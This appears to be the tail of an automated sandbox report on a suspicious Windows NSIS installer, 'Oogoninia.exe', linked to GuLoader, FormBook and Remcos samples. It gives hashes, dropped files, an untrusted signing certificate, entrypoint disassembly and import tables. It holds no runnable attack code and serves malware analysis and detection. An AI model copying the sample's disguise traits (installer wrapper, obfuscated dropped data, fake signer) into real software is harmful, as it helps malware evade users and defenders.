                                                                                                                                                                15:56:46API Interceptor193x Sleep call for process: explorer.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                No context

                                                                                                                                                                Domains

                                                                                                                                                                No context

                                                                                                                                                                ASNs

                                                                                                                                                                No context

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                rStopfodringer.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                H6s8pGsYjg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                asXlZG3aW6.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                15PylGQjzK.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                Ji7kZhlqxz.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78
                                                                                                                                                                Transferencia 10-7-2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 142.251.40.129
                                                                                                                                                                • 142.250.80.78

                                                                                                                                                                Dropped Files

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dllrStopfodringer.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                  rStopfodringer.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                    Transferencia 10-7-2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                      Transferencia 10-7-2024.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                        PEDIDO-144848.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          PEDIDO-144848.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                            transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                              transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                KZ710-0038.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Program Files (x86)\Fljtenists.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):34
                                                                                                                                                                                  Entropy (8bit):4.35937791471612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:oMXADiGWkon:xnGWn
                                                                                                                                                                                  MD5:5BAD417385FA63549574090876DC680D
                                                                                                                                                                                  SHA1:84E00066DC079E657BE9AF39E2C9E4EC42F5E527
                                                                                                                                                                                  SHA-256:8B8CCA2780BD72F608E87BAEC979BBB17706AEFEB8D9F603E53AE144ECFAB71D
                                                                                                                                                                                  SHA-512:EA709BAB31CFAAB4979617C4D1DFF414387F6988BE9F67E70BF7F941A9E7EA4C36CF320CE2518AE0DD9171DF5C46BE85D86D3F6031059A3CB3E79FD58E3F14E2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:[Omniregent]..promovable=bugspyt..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11264
                                                                                                                                                                                  Entropy (8bit):5.7711167426271945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                                                                                                                                  MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                                                                                                                                  SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                                                                                                                                  SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                                                                                                                                  SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: rStopfodringer.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: rStopfodringer.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Transferencia 10-7-2024.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Transferencia 10-7-2024.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: PEDIDO-144848.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: PEDIDO-144848.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: transferencia.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: transferencia.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: KZ710-0038.exe, Detection: malicious, Browse
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\slavelivets\Bagpaa.Mon

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):443396
                                                                                                                                                                                  Entropy (8bit):2.6506140893550536
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:BGo1P6b7nn68mltqdZl30ciddrEHJsP2JC:BGQP6b7npmTsp0c0RSJa2JC
                                                                                                                                                                                  MD5:882A0D458279279C786D38A56F20B77D
                                                                                                                                                                                  SHA1:010E3688FC482A7E98E8C60BAFFE73F57800EE77
                                                                                                                                                                                  SHA-256:375D0775B3FD050C4AE89F99ABE1C2D71697D3180B32537EC3DFFC320F81E9C4
                                                                                                                                                                                  SHA-512:D52D469138E7FCD0B392EB8964E624E6FC0D60F23653B30827AC19BBCFF7D62968D4692CCFBDDA57E3D8CD42CFA1BF791321DD6436F48C1C9C4BEC428A8330C0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:000000001A1A0000C00000EDED000000E400005E5E00C0C000585858585800BA006700000000FAFA00AD003E00EF00410000F9F9002C0000DD0000F100000000540000460000C9C900A3A3000202000000C7C7C70000D100EF000000570075000000B100000000000000001F00003F3F3F3F3F00005050505050500000BEBE00C7C7C7000000141414002E009E004400A200F30000C700F000B6B60000CF00006100ACAC00939300000E00D9D9007D000F00FE00C4C4C4C400FE00E8E8004D4D0000D200004242000000000000001E000000E0E00000006969696900A7000000C7C7C7C7C700C80000005D5D000A006F6F0000D2000000000000009494940000003200BEBE005A5A0065000000000000EAEAEAEA0000000057000000000000000000000000000000000023000000000000450057000000001800004A4A00E10050000000002B000000000039000000A7A7A7A7A700005E5E0000EDED00171700005C5C00003300B10000008800007900FEFEFE0000F4F4F4000000000000FB0000010000AE004B00F3F300840000001414141400003B0000181818181818180000BABA008400000054004949490089000000000000004444000000BD00000000000000C6C6C600AE000000C7004B4B4B0000E000EDED00A50000E3E3E30000A00000ED0000D500DC008585000050500000840000

                                                                                                                                                                                  C:\Users\user\slavelivets\Condign.Str

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):223893
                                                                                                                                                                                  Entropy (8bit):7.494218895114718
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:Qsi43bNkvibXjg2tgcFhhOGwcjuYpj1CbTD:A43byvib0spDhO/Muq1WD
                                                                                                                                                                                  MD5:AFD211403054996BD48E1A48AC7F7FE2
                                                                                                                                                                                  SHA1:9EABF5E146F2FCA57906E46B81012F6B3CA02157
                                                                                                                                                                                  SHA-256:1211392B8B3D61CF8ED4DBED0AD6FF93AE608FAA1E9B124A55B60D33AB281A9D
                                                                                                                                                                                  SHA-512:6C3A43A1B18D341357E902E317FCBDA55284C34339DDF3E6FBD03481A92AA86D49794F5A7AF488CF29C7D459C2F67BC78EBD5CD0500B55F34823681C5D636FF4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..............._.....CC..........G.............C..........EE.J..d..............m..................................O...........||.....X.....R................#...........................I.444.2....................++++..:..@@...W.............bb.c....pppp.........................999..>>>>......................N...9....IIIII.............9.kk................_..(.......cc.....d.""".............55...................RR....3.""".....|||||.....[[[.......nn......c.w..............t..........."...[[.............h..M....J........................yy......7..........//..:......................I..,,,,...........{.......................?.................D....RR........eee.....................................XX.b.......w.............~...........}}....f................/.......ww.ggggg...................VV......@...................V..KK......D......................pp..^^^......|......B.==...AA....=.fff...........4...(.I.%%%%...z.....................GGG...#.s......'................%%%%%................y.I..Q.

                                                                                                                                                                                  C:\Users\user\slavelivets\alsmekill.sta

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):339393
                                                                                                                                                                                  Entropy (8bit):1.2543469977620876
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:JwpZQcXbJ+mf8ME8s+dg5Z90uGaXF9Pl7:W4cX8ncmxhGm
                                                                                                                                                                                  MD5:F6A8488B1B62B7AC3B0979C8FBEABB30
                                                                                                                                                                                  SHA1:9725896EBC26CCB2CB9060640B9E0D4A0618916F
                                                                                                                                                                                  SHA-256:34DC9B70D0CE5223A531E499611F1208F3AE85AAEF9973FC27E89190568F8EE2
                                                                                                                                                                                  SHA-512:88A719685D0972290632C6B5A665184E79A98BE22B76AF28F18056F2E7A721A0B2D3B4A8815BCE562426643E69F998F9E45F3CA62B3288EAAFB71FE89A23AD20
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..............................................o....D....................l.......k...................................._...2...........;..........................................0............................e......_....................}.......................,....4...................n.............T................j...z..........u.....#...................h............].............................................................................................................1......G...h.......g...3..(........................................................H......)...........o...................4.............^..................."....................$....................E..............................................................|..........3.............1...........................S....................x..........................................................................................................................................................=..........................|....

                                                                                                                                                                                  C:\Users\user\slavelivets\boat.ast

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):456047
                                                                                                                                                                                  Entropy (8bit):1.2479728238915362
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:WqBSYr/TzktUI9ql+6iD8iDu43pfrmQ+PHlyjwkZY51UG90JdfSDUsby4/FApmbO:I3TS9ymKhysrQEkRbwvL3xcbNyFN2Mv
                                                                                                                                                                                  MD5:9911B32FE219697A738F39AE5766B512
                                                                                                                                                                                  SHA1:DA67EBB043C778DEEA874E1C746483A2B65E533C
                                                                                                                                                                                  SHA-256:1D3D52ECB41F725DC23080ACB1ACDFEDF29BB5F167DCB75F89AF837888421880
                                                                                                                                                                                  SHA-512:FBF703CD56434BB14C6A1A34878F094BE183D9F638D0F34074F7EE4C9D12DB70A833679B496FCB1E4C6050C418A906221149AAC70035BCDA3C01D4272C0FE3E8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.................................................z.................m.......L.......<.............................................................._.....y....._.........x.................................................................>............Q...........:e........................................................[.-.:....................................................A.....................................................................G................................+..............................z..........................................]...........................................................................................T.....&.}........G..............c...u.....................5......B....................................................................l................H..........................H.......................|...........................m.............................................:...........(...............8..............................................g.....

                                                                                                                                                                                  C:\Users\user\slavelivets\rupis.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):276
                                                                                                                                                                                  Entropy (8bit):4.348758704403097
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:4s/IdpH+oqGSUkJOlUjvMzJ7HxXEp6JN+qIN2CGZgw9n7FmNIb+:4skpesSUAOlSsJ7BEpg+H2XWwTmCq
                                                                                                                                                                                  MD5:668A01D3AF55A42FBFDBB1E9DD730B59
                                                                                                                                                                                  SHA1:E0949D489A15516B3CD09F1043543C38E3688F1A
                                                                                                                                                                                  SHA-256:6A7FEEBFE1F4330E611E6E1B3804619D329A9D3ABD3A3ECBD9D441F884E9999D
                                                                                                                                                                                  SHA-512:CF3F03583667362ADCEA4DEB094513B84D3E275EBCC42A993F9293B7374618A1BA060D4C4BAE446C02B329DDE2A4579C152F54A1F7537A0F83A3E88406509459
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:vulcanizable zoanthidae raalam osullivan,phantasmic oxyluminescence fluidness pickin raadelig.muslimer broder encyclopaedically bessarabian bvt.skyggespillene shellfishes urmi fume panocha imago,troskabseder cypriotes thalassian,udvandringskontorers telfonmontrens bugtalende.

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Entropy (8bit):7.328754040700386
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:Oogoninia.exe
                                                                                                                                                                                  File size:633'576 bytes
                                                                                                                                                                                  MD5:18fb2cccaa9ac71624eaceada006e938
                                                                                                                                                                                  SHA1:a25055a3b29ce0ee64d7e20eccced0f72ec737db
                                                                                                                                                                                  SHA256:9b00715d77438200a4f54fa8f47ac17aab0cc166e95fc6737c2a78021b69a64e
                                                                                                                                                                                  SHA512:5828d7ee60e66afac8d3650930ed8556adc9693ab32ca872cc16f71382568baa471827cee1162393b7bce2c725965bd92377e7960225e43e00aef87754a2215d
                                                                                                                                                                                  SSDEEP:6144:SyI5s2239XH7ySqrVWOqnBRryl2sIgghQtUnQl8uFfKIn4jma8LIwJzSdfoVLg68:H22tH7L0kel2sInQDlxnPn906OLhsI
                                                                                                                                                                                  TLSH:9FD401533A0968E0F8E21C7154BB8A61457F9F7ABA85342FB3D8730614F224A473E7D6
                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:8b1985c04404416d

                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Entrypoint:0x403180
                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                  Signature Issuer:CN="Foliating Escapisms Uloid ", E=Kundskabsriges@Udviklingsmodell.Kat, L=Chertsey, S=England, C=GB
                                                                                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                  Error Number:-2146762487
                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                  • 08/04/2024 02:49:58 08/04/2027 02:49:58
                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                  • CN="Foliating Escapisms Uloid ", E=Kundskabsriges@Udviklingsmodell.Kat, L=Chertsey, S=England, C=GB
                                                                                                                                                                                  Version:3
                                                                                                                                                                                  Thumbprint MD5:89A83BDA74F459F4A955D3D0328F50FD
                                                                                                                                                                                  Thumbprint SHA-1:D2C7FB79BEAD99BD1656CE093680D9EA02FB63C1
                                                                                                                                                                                  Thumbprint SHA-256:1D5E94B1AF6A4231ED7115D0182A9D7FEE87AD4ABB35283CADEA69B3814DA5AD
                                                                                                                                                                                  Serial:73760555AB4AD8741E67D8C7F00AB0F68B16BF30

                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                  Instruction
                                                                                                                                                                                  sub esp, 00000184h
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  push esi
                                                                                                                                                                                  push edi
                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                                                                  mov dword ptr [esp+10h], 00409198h
                                                                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                  call dword ptr [004070A8h]
                                                                                                                                                                                  call dword ptr [004070A4h]
                                                                                                                                                                                  cmp ax, 00000006h
                                                                                                                                                                                  je 00007F3744F348C3h
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  call 00007F3744F37831h
                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                  je 00007F3744F348B9h
                                                                                                                                                                                  push 00000C00h
                                                                                                                                                                                  call eax
                                                                                                                                                                                  mov esi, 00407298h
                                                                                                                                                                                  push esi
                                                                                                                                                                                  call 00007F3744F377ADh
                                                                                                                                                                                  push esi
                                                                                                                                                                                  call dword ptr [004070A0h]
                                                                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                                                                                  jne 00007F3744F3489Dh
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  push 00000009h
                                                                                                                                                                                  call 00007F3744F37804h
                                                                                                                                                                                  push 00000007h
                                                                                                                                                                                  call 00007F3744F377FDh
                                                                                                                                                                                  mov dword ptr [007A1F44h], eax
                                                                                                                                                                                  call dword ptr [00407044h]
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  call dword ptr [00407288h]
                                                                                                                                                                                  mov dword ptr [007A1FF8h], eax
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                  push 00000160h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  push 0079D500h
                                                                                                                                                                                  call dword ptr [00407174h]
                                                                                                                                                                                  push 00409188h
                                                                                                                                                                                  push 007A1740h
                                                                                                                                                                                  call 00007F3744F37427h
                                                                                                                                                                                  call dword ptr [0040709Ch]
                                                                                                                                                                                  mov ebp, 007A8000h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  call 00007F3744F37415h
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  call dword ptr [00407154h]

                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                  Data Directories

                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c30000x28340.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x997580x1390.data
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                  Sections

                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  .text0x10000x5e4a0x600030c42419b2e69d0fb178ad82fde5a6a6False0.6707356770833334data6.461674766148295IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .data0x90000x3990380x400295703f29cbf0cc87537f54786ed1d01unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .ndata0x3a30000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x3c30000x283400x284000a923a42d1a39b5e7ff4cbf67045065cFalse0.21775524068322982data4.016272150271427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                  Resources

                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_ICON0x3c33580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.1348337868212469
                                                                                                                                                                                  RT_ICON0x3d3b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.24942190456169855
                                                                                                                                                                                  RT_ICON0x3dd0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.286090573012939
                                                                                                                                                                                  RT_ICON0x3e24b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.2502952290977799
                                                                                                                                                                                  RT_ICON0x3e66d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3522821576763486
                                                                                                                                                                                  RT_ICON0x3e8c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.37828330206378985
                                                                                                                                                                                  RT_ICON0x3e9d280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4668032786885246
                                                                                                                                                                                  RT_ICON0x3ea6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5106382978723404
                                                                                                                                                                                  RT_DIALOG0x3eab180x100dataEnglishUnited States0.5234375
                                                                                                                                                                                  RT_DIALOG0x3eac180x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                  RT_DIALOG0x3ead380xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                  RT_DIALOG0x3eae000x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                  RT_GROUP_ICON0x3eae600x76dataEnglishUnited States0.7542372881355932
                                                                                                                                                                                  RT_VERSION0x3eaed80x128dataEnglishUnited States0.6114864864864865
                                                                                                                                                                                  RT_MANIFEST0x3eb0000x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                                                                  Imports

                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                                                                                                  USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                                                  ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

